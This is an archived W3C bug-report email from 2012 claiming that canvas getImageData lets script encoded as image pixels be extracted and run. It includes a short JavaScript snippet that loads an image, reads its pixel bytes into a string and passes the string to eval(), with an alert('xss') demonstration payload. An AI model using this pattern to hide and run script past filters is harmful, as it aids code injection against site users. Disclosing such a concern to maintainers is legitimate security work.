W3C home > Mailing lists > Public > public-html-bugzilla@w3.org > November 2012

[Bug 20034] New: canvas getImageData opens security whole for code

From: <bugzilla@jessica.w3.org>
Date: Wed, 21 Nov 2012 05:52:50 +0000
To: public-html-bugzilla@w3.org
Message-ID: <bug-20034-2486@http.www.w3.org/Bugs/Public/>
https://www.w3.org/Bugs/Public/show_bug.cgi?id=20034

            Bug ID: 20034
           Summary: canvas getImageData opens security whole for code
    Classification: Unclassified
           Product: HTML WG
           Version: unspecified
          Hardware: All
                OS: All
            Status: NEW
          Severity: critical
          Priority: P2
         Component: HTML Canvas 2D Context
          Assignee: jaymunro@microsoft.com
          Reporter: bertram@n-bis.de
        QA Contact: public-html-bugzilla@w3.org
                CC: mike@w3.org, public-html-wg-issue-tracking@w3.org,
                    public-html@w3.org

Created attachment 1249
  --> https://www.w3.org/Bugs/Public/attachment.cgi?id=1249&action=edit
sample image and html side

With the canvas it is possible to read byte data out of an image.
Images himself can come from different urls (hosts) without restriction.
What happens when someone fill an image with code values as pixel data, load
the image into an canvas and interpret it?
He could execute code without any knowledge of any security prevention because
the "code" are an image.
What I've done is simple:
1. create an image where the pixel are the color representation of
  window['alert']('xss')
  this could be an gif, png... It depends of the color interpolation in the
resulting image.
2. load the image into a web side
3. create an canvas object an put the image inside.
4. read the byte data of the canvas and cast it as string to eval
Eh viola

This is small js for it:
var img=new Image();
img.onload=function()
{
var ca = document.createElement('canvas');
ca.width=this.width;
ca.height=this.height;
var ctx = ca.getContext('2d');
ctx.drawImage(this,0,0);
var a="",d=ctx.getImageData(0, 0,this.width, this.height).data;
for(var i=0;i<d.length;i++){
if(d[i]<255) a+=String.fromCharCode(d[i]);
}
eval(a);
}
img.src="exploid.gif";

-- 
You are receiving this mail because:
You are the QA Contact for the bug.
Received on Wednesday, 21 November 2012 05:52:52 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Wednesday, 21 November 2012 05:52:52 GMT